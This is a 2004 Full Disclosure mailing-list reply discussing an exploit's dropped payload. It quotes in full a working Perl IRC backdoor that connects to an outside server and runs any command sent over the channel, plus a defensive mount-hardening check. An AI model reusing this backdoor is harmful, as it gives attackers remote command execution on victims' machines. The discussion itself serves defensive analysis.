Full Disclosure
mailing list archives
Re: New Remote Windows Exploit (MS04-029)
From: Rodrigo Barbosa <rodrigob () suespammers org>
Date: Thu, 4 Nov 2004 15:33:38 -0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.
#!/usr/bin/perl
$chan = "#0x";
$nick = "k";
$server = "ir3ip.net";
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new( $server . ":6667" ) || exit;
print $sock "USER k +i k :kv1\nNICK k\n";
$i = 1;
while ( <$sock> =~ /^[^ ]+ ([^ ]+) / ) {
    $mode = $1;
    last if $mode == "001";
    if ( $mode == "433" ) {
        $i++;
        $nick =~ s/\d*$/$i/;
        print $sock "NICK $nick\n";
    }
}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
while (<$sock>) {
    if (/^PING (.*)$/) { print $sock "PONG $1\nJOIN $chan\n"; }
    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        s/\s*$//;
        $_ = `$_`;
        foreach ( split "\n" ) { print $sock "PRIVMSG $chan :$_\n"; sleep 1; }
    }
} #/tmp/hi/tmp/hi
- --
Rodrigo Barbosa <rodrigob () suespammers org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iD8DBQFBimfypdyWzQ5b5ckRAuUQAJ48GRrbT8dg4TuQSBmuY1gaFUFrTgCcDjAk
heUfzGqMnM0K/OkuPzts0bA=
=rZBE
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
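An added example, not part of the original message or thread: a shell check that reads `mount`-style lines in the format quoted above and reports which of `noexec`, `nodev` and `nosuid` are missing on a given mount point. The function names and every sample line other than the `/tmp` one are constructed for illustration.

```shell
#!/bin/sh
# Check mount(8)-style lines for the hardening options shown in the message,
# e.g.  /dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
REQUIRED="noexec nodev nosuid"

# Constructed sample table; only the /tmp line is taken from the message.
sample_mounts() {
    cat <<'EOF'
/dev/sda1 on / type ext3 (rw)
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
/dev/sda3 on /var/tmp type ext3 (rw,nosuid)
EOF
}

# missing_opts MOUNTPOINT (mount output on stdin): prints the required options
# that are absent, "not-a-mount" if the path has no entry, or an empty line.
missing_opts() {
    target=$1
    line=$(awk -v t="$target" '$2 == "on" && $3 == t { l = $0 } END { print l }')
    if [ -z "$line" ]; then echo "not-a-mount"; return 0; fi
    # Options are the text inside the last parentheses; pad with commas.
    opts=",$(printf '%s\n' "$line" | sed 's/.*(\(.*\))[^)]*$/\1/'),"
    out=""
    for o in $REQUIRED; do
        case $opts in
            *",$o,"*) ;;
            *) out="$out${out:+ }$o" ;;
        esac
    done
    printf '%s\n' "$out"
}

# audit_mounts MOUNTPOINT... (mount output on stdin): returns 1 on any gap.
audit_mounts() {
    table=$(cat); rc=0
    for mp in "$@"; do
        miss=$(printf '%s\n' "$table" | missing_opts "$mp")
        if [ -n "$miss" ]; then echo "$mp: $miss"; rc=1
        else echo "$mp: ok"
        fi
    done
    return $rc
}

sample_mounts | audit_mounts /tmp /var/tmp /dev/shm || echo "hardening gaps found"
```

On a live host, run `mount | audit_mounts /tmp /var/tmp /dev/shm`. `noexec` blocks direct execution of a file stored on that mount; a script handed as an argument to an interpreter installed elsewhere is still read and run, so treat the option as one layer alongside egress filtering and process monitoring.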